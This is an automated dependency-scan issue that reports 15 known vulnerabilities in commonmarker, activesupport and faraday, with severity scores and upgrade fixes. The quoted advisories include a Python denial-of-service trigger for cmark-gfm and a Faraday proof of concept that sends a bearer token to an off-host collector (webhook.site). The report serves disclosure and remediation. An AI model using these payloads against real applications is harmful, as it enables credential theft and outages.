Skip to content

github-pages-223.gem: 15 vulnerabilities (highest severity is: 9.8) #27

@mend-for-mygithub.libinneed.workers.dev

Description

Vulnerable Library - github-pages-223.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Vulnerabilities

Vulnerability Severity CVSS Dependency Type Fixed in (github-pages version) Remediation Possible**
CVE-2024-22051 Critical 9.8 commonmarker-0.17.13.gem Transitive N/A*
WS-2022-0093 High 8.8 commonmarker-0.17.13.gem Transitive N/A*
CVE-2022-24724 High 8.8 commonmarker-0.17.13.gem Transitive N/A*
WS-2023-0095 High 7.5 commonmarker-0.17.13.gem Transitive N/A*
WS-2022-0320 High 7.5 commonmarker-0.17.13.gem Transitive N/A*
CVE-2026-33176 High 7.5 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2023-22796 High 7.5 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2023-38037 Medium 5.5 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2026-33169 Medium 5.3 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2023-28120 Medium 5.3 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2023-26485 Medium 5.3 commonmarker-0.17.13.gem Transitive N/A*
CVE-2023-24824 Medium 5.3 commonmarker-0.17.13.gem Transitive N/A*
CVE-2026-33170 Medium 4.3 activesupport-6.0.6.1.gem Transitive N/A*
CVE-2023-22483 Low 3.5 commonmarker-0.17.13.gem Transitive N/A*
CVE-2026-33637 Low 0.0 faraday-2.14.1.gem Transitive N/A*

*For some transitive vulnerabilities, there is no version of direct dependency with a fix. Check the "Details" section below to see if there is a version of transitive dependency where vulnerability is fixed.

**In some cases, Remediation PR cannot be created automatically for a vulnerability despite the availability of remediation

Details

CVE-2024-22051

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

CommonMarker versions prior to 0.23.4 are at risk of an integer overflow vulnerability. This vulnerability can result in possibly unauthenticated remote attackers to cause heap memory corruption, potentially leading to an information leak or remote code execution, via parsing tables with marker rows that contain more than UINT16_MAX columns.

Publish Date: 2024-01-04

URL: CVE-2024-22051

CVSS 3 Score Details (9.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-fmx4-26r3-wxpf

Release Date: 2024-01-04

Fix Resolution: commonmarker - 0.23.4

WS-2022-0093

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

commonmarker versions prior to 0.23.4 are vulnerable to heap memory corruption when parsing tables whose marker rows contain more than UINT16_MAX columns.
The impact of this heap corruption ranges from Information Leak to Arbitrary Code Execution.

Publish Date: 2026-05-14

URL: WS-2022-0093

CVSS 3 Score Details (8.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-fmx4-26r3-wxpf

Release Date: 2022-02-03

Fix Resolution: commonmarker - 0.23.4,cmark-gfm-sys - no_fix,rb-commonmarker - no_fix,comrak - 0.6.2,commonmarker - 0.23.4,comrak - 0.2.6

CVE-2022-24724

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's extended version of the C reference implementation of CommonMark. Prior to versions 0.29.0.gfm.3 and 0.28.3.gfm.21, an integer overflow in cmark-gfm's table row parsing "table.c:row_from_string" may lead to heap memory corruption when parsing tables who's marker rows contain more than UINT16_MAX columns. The impact of this heap corruption ranges from Information Leak to Arbitrary Code Execution depending on how and where "cmark-gfm" is used. If "cmark-gfm" is used for rendering remote user controlled markdown, this vulnerability may lead to Remote Code Execution (RCE) in applications employing affected versions of the "cmark-gfm" library. This vulnerability has been patched in the following cmark-gfm versions 0.29.0.gfm.3 and 0.28.3.gfm.21. A workaround is available. The vulnerability exists in the table markdown extensions of cmark-gfm. Disabling the table extension will prevent this vulnerability from being triggered.

Publish Date: 2022-03-03

URL: CVE-2022-24724

CVSS 3 Score Details (8.8)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: High
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-7

Release Date: 2022-03-03

Fix Resolution: commonmark - 1.8

WS-2023-0095

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Impact Several quadratic complexity bugs in commonmarker's underlying ""cmark-gfm"" (https://github.com/github/cmark-gfm) library may lead to unbounded resource exhaustion and subsequent denial of service. The following vulnerabilities were addressed: * "CVE-2023-24824" (GHSA-66g8-4hjf-77xh) * "CVE-2023-26485" (GHSA-r8vr-c48j-fcc5) For more information, consult the release notes for version ""0.23.0.gfm.10"" (https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.10) and ""0.23.0.gfm.11"" (https://github.com/github/cmark-gfm/releases/tag/0.29.0.gfm.11). Mitigation Users are advised to upgrade to commonmarker version ""0.23.9"" (https://rubygems.org/gems/commonmarker/versions/0.23.9).

Publish Date: 2026-05-15

URL: WS-2023-0095

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-48wp-p9qv-4j64

Release Date: 2024-12-04

Fix Resolution: commonmarker - 0.23.9

WS-2022-0320

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Impact CommonMarker uses "cmark-gfm" for rendering "Github Flavored Markdown" (https://github.github.com/gfm/). A polynomial time complexity issue in cmark-gfm's autolink extension may lead to unbounded resource exhaustion and subsequent denial of service. Patches This vulnerability has been patched in the following CommonMarker release: - v0.23.6 Workarounds Disable use of the autolink extension. References https://redirect.github.com/gjtorikian/commonmarker/pull/190 GHSA-cgh3-p57x-9q7q https://en.wikipedia.org/wiki/Time_complexity For more information If you have any questions or comments about this advisory: * Open an issue in "github/cmark-gfm" (https://github.com/github/cmark-gfm) Acknowledgements We would like to thank "Legit Security" (https://www.legitsecurity.com) for reporting this vulnerability.

Publish Date: 2026-05-15

URL: WS-2022-0320

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-4qw4-jpp4-8gvp

Release Date: 2024-12-02

Fix Resolution: commonmarker - 0.23.6

CVE-2026-33176

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, Active Support number helpers accept strings containing scientific notation (e.g. "1e10000"), which "BigDecimal" expands into extremely large decimal representations. This can cause excessive memory allocation and CPU consumption when the expanded number is formatted, possibly resulting in a DoS vulnerability. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33176

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v7.2.3.1,https://github.com/rails/rails.git - v8.0.5,https://github.com/rails/rails.git - v8.1.3,https://github.com/rails/rails.git - v8.1.2.1

CVE-2023-22796

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

A regular expression based DoS vulnerability in Active Support <6.1.7.1 and <7.0.4.1. A specially crafted string passed to the underscore method can cause the regular expression engine to enter a state of catastrophic backtracking. This can cause the process to use large amounts of CPU and memory, leading to a possible DoS vulnerability.

Publish Date: 2023-02-09

URL: CVE-2023-22796

CVSS 3 Score Details (7.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: High

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-j6gc-792m-qgm2

Release Date: 2023-02-09

Fix Resolution: activesupport - 7.0.4.1,activesupport - 6.1.7.1

CVE-2023-38037

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

ActiveSupport::EncryptedFile writes contents that will be encrypted to a temporary file. The temporary file's permissions are defaulted to the user's current "umask" settings, meaning that it's possible for other users on the same system to read the contents of the temporary file. Attackers that have access to the file system could possibly read the contents of this temporary file while a user is editing it. All users running an affected release should either upgrade or use one of the workarounds immediately.

Publish Date: 2025-01-09

URL: CVE-2023-38037

CVSS 3 Score Details (5.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Local
    • Attack Complexity: High
    • Privileges Required: Low
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: High
    • Integrity Impact: Low
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-cr5q-6q9f-rq6q

Release Date: 2025-01-09

Fix Resolution: activesupport - 6.1.7.5,activesupport - 7.0.7.1

CVE-2026-33169

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. "NumberToDelimitedConverter" uses a lookahead-based regular expression with "gsub!" to insert thousands delimiters. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, the interaction between the repeated lookahead group and "gsub!" can produce quadratic time complexity on long digit strings. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33169

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v8.1.2.1,https://github.com/rails/rails.git - v7.2.3.1

CVE-2023-28120

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

There is a vulnerability in ActiveSupport if the new bytesplice method is called on a SafeBuffer with untrusted user input.

Publish Date: 2025-01-09

URL: CVE-2023-28120

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-pj73-v5mw-pm9j

Release Date: 2025-01-09

Fix Resolution: activesupport - 6.1.7.3,activesupport - 7.0.4.3

CVE-2023-26485

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of _ characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources. ### Impact A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. ### Proof of concept $ ~/cmark-gfm$ python3 -c 'pad = "_" * 100000; print(pad + "." + pad, end="")' | time ./build/src/cmark-gfm --to plaintext Increasing the number 10000 in the above commands causes the running time to increase quadratically. ### Patches This vulnerability have been patched in 0.29.0.gfm.10. ### Note on cmark and cmark-gfm XXX: TBD cmark-gfm is a fork of cmark that adds the GitHub Flavored Markdown extensions. The two codebases have diverged over time, but share a common core. These bugs affect both cmark and cmark-gfm. ### Credit We would like to thank @⁠gravypod for reporting this vulnerability. ### References https://en.wikipedia.org/wiki/Time_complexity ### For more information If you have any questions or comments about this advisory: * Open an issue in github/cmark-gfm
Mend Note: The description of this vulnerability differs from MITRE.

Publish Date: 2023-03-31

URL: CVE-2023-26485

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-03-31

Fix Resolution: commonmark - 1.9.2

CVE-2023-24824

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. A polynomial time complexity issue in cmark-gfm may lead to unbounded resource exhaustion and subsequent denial of service. This CVE covers quadratic complexity issues when parsing text which leads with either large numbers of > or - characters. This issue has been addressed in version 0.29.0.gfm.10. Users are advised to upgrade. Users unable to upgrade should validate that their input comes from trusted sources.

Publish Date: 2023-03-31

URL: CVE-2023-24824

CVSS 3 Score Details (5.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-03-31

Fix Resolution: commonmark - 1.9.2

CVE-2026-33170

Vulnerable Library - activesupport-6.0.6.1.gem

A toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Rich support for multibyte strings, internationalization, time zones, and testing.

Library home page: https://rubygems.org/gems/activesupport-6.0.6.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/activesupport-6.0.6.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jemoji-0.12.0.gem
      • html-pipeline-2.14.3.gem
        • activesupport-6.0.6.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Active Support is a toolkit of support libraries and Ruby core extensions extracted from the Rails framework. Prior to versions 8.1.2.1, 8.0.4.1, and 7.2.3.1, "SafeBuffer#%" does not propagate the "@⁠html_unsafe" flag to the newly created buffer. If a "SafeBuffer" is mutated in place (e.g. via "gsub!") and then formatted with "%" using untrusted arguments, the result incorrectly reports "html_safe? == true", bypassing ERB auto-escaping and possibly leading to XSS. Versions 8.1.2.1, 8.0.4.1, and 7.2.3.1 contain a patch.

Publish Date: 2026-03-23

URL: CVE-2026-33170

CVSS 3 Score Details (4.3)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: Required
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: Low
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Release Date: 2026-03-23

Fix Resolution: https://github.com/rails/rails.git - v7.2.3.1,https://github.com/rails/rails.git - v8.0.4.1,https://github.com/rails/rails.git - v8.1.3,https://github.com/rails/rails.git - v8.1.2.1,https://github.com/rails/rails.git - v8.0.5

CVE-2023-22483

Vulnerable Library - commonmarker-0.17.13.gem

A fast, safe, extensible parser for CommonMark. This wraps the official libcmark library.

Library home page: https://rubygems.org/gems/commonmarker-0.17.13.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/commonmarker-0.17.13.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-commonmark-ghpages-0.1.6.gem
      • commonmarker-0.17.13.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

cmark-gfm is GitHub's fork of cmark, a CommonMark parsing and rendering library and program in C. Versions prior to 0.29.0.gfm.7 are subject to several polynomial time complexity issues in cmark-gfm that may lead to unbounded resource exhaustion and subsequent denial of service. Various commands, when piped to cmark-gfm with large values, cause the running time to increase quadratically. These vulnerabilities have been patched in version 0.29.0.gfm.7.

Publish Date: 2023-01-23

URL: CVE-2023-22483

CVSS 3 Score Details (3.5)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Adjacent
    • Attack Complexity: Low
    • Privileges Required: Low
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: Low

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: https://osv.dev/vulnerability/RSEC-2023-8

Release Date: 2023-01-23

Fix Resolution: commonmark - 1.9.2

CVE-2026-33637

Vulnerable Library - faraday-2.14.1.gem

Library home page: https://rubygems.org/gems/faraday-2.14.1.gem

Path to dependency file: /docs/Gemfile.lock

Path to vulnerable library: /docs/vendor/cache/faraday-2.14.1.gem

Dependency Hierarchy:

  • github-pages-223.gem (Root Library)
    • jekyll-theme-primer-0.6.0.gem
      • jekyll-github-metadata-2.13.0.gem
        • octokit-4.25.1.gem
          • faraday-2.14.1.gem (Vulnerable Library)

Found in HEAD commit: bea8d31d02f4cc512745e63bd2b82b36d6af34c7

Found in base branch: master

Vulnerability Details

Summary "Faraday::Connection#build_exclusive_url" still allows protocol-relative host override when the request target is provided as a "URI" object instead of a "String". This bypasses the February 2026 fix for "GHSA-33mh-2634-fwr2" and can redirect a request built from a fixed-base "Faraday::Connection" to an attacker-controlled host while preserving connection-scoped headers such as "Authorization". Affected Component - Repository File(s)/Endpoint(s): - "lib/faraday/connection.rb" - "lib/faraday/request.rb" - "spec/faraday/connection_spec.rb" - "spec/faraday/request_spec.rb" - Function(s): - "Faraday::Connection#build_exclusive_url" - "Faraday::Connection#run_request" - "Faraday::Request#url" - "Faraday::Request#to_env" - Version(s) Tested: - "Faraday 2.14.1" - repository HEAD "a01039c948d3e9e41e03d152aed7244f0fb4d5ca" Attacker Profile - Who: A remote user who can influence a per-request target/path in an application that uses a fixed-base Faraday connection - Access Required: Ability to supply data that the application converts to "URI.parse(...)" and passes to "conn.get(...)", ""conn.post" (http://conn.post/)(...)", or "req.url(...)" - Capability: Control over a protocol-relative URI such as "URI("//evil.example/pwn")" Steps to Reproduce 1. Use the current repository checkout and load Faraday from "lib/". 2. Build a fixed-base connection and provide a protocol-relative "URI" object to "req.url". 3. Observe that the request is actually sent to the attacker-controlled host instead of the configured base host. 4. Observe that the connection-scoped "Authorization" header remains attached to the off-host request. Verification Evidence - Environment: macOS, Ruby from local environment, Faraday "2.14.1", "faraday-net_http", local WEBrick listener on "127.0.0.1:4567", HEAD "a01039c948d3e9e41e03d152aed7244f0fb4d5ca" - Commands executed: $ ruby -e 'require "webrick"; server = WEBrick::HTTPServer.new(Port: 4567, BindAddress: "127.0.0.1", AccessLog: [], Logger: WEBrick::Log.new($stderr, WEBrick::Log::WARN)); server.mount_proc("/") { |req, res| res.status = 200; res.body = "host=#{req.host}\nauth=#{req["Authorization"]}\npath=#{req.path}\n" }; trap("INT") { server.shutdown }; server.start' $ ruby -Ilib -e 'require "faraday"; require "faraday/net_http"; conn = Faraday.new(url: "http://trusted.example/base", headers: {"Authorization" => "Bearer secret-token"}) { |f| f.adapter :net_http }; target = ["//127.0.0.1:4567", "/pwn"].join; resp = conn.get(URI(target)); puts resp.status; puts resp.body' - PoC code (inline): require "faraday" require "faraday/net_http" conn = Faraday.new(url: "http://trusted.example/base", headers: { "Authorization" => "Bearer secret-token" }) { |f| f.adapter :net_http } target = ["//127.0.0.1:4567", "/pwn"].join resp = conn.get(URI(target)) puts resp.status puts resp.body - Exit code: "0" - stdout (relevant excerpt): 200 host=127.0.0.1 auth=Bearer secret-token path=/pwn - stderr (relevant excerpt): N/A - Artifacts: none Additional External Confirmation The issue was also independently reproduced against a public HTTP collector on Faraday "2.14.1" using the default "net_http" adapter: require "faraday" require "faraday/net_http" conn = Faraday.new( url: "http://trusted.example/base", headers: { "Authorization" => "Bearer secret-token" } ) { |f| f.adapter :net_http } target = ["//webhook.site", "/"].join resp = conn.get(URI(target)) resp.status => 200 resp.url.host => "webhook.site" This external confirmation shows the request is not only misbuilt in memory, but is actually dispatched off-host by a real adapter under normal usage. Supporting Materials - Existing advisory for the original string-based issue: "GHSA-33mh-2634-fwr2" - Existing CVE for the original string-based issue: "CVE-2026-25765" - Existing regression tests for the string-only fix: - "spec/faraday/connection_spec.rb:314-345" - Existing test proving supported "URI" request input: - "spec/faraday/request_spec.rb:26-31" Impact The direct consequence is off-host request forgery from code paths that believe they are constrained to a fixed base URL. If the connection carries default headers or query parameters, those values are forwarded to the attacker-selected host.

Publish Date: 2026-05-18

URL: CVE-2026-33637

CVSS 3 Score Details (0.0)

Base Score Metrics:

  • Exploitability Metrics:
    • Attack Vector: Network
    • Attack Complexity: Low
    • Privileges Required: None
    • User Interaction: None
    • Scope: Unchanged
  • Impact Metrics:
    • Confidentiality Impact: None
    • Integrity Impact: None
    • Availability Impact: None

For more information on CVSS3 Scores, click here.

Suggested Fix

Type: Upgrade version

Origin: GHSA-5rv5-xj5j-3484

Release Date: 2026-05-18

Fix Resolution: faraday - 2.14.2

Metadata

Metadata

Assignees

No one assigned

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions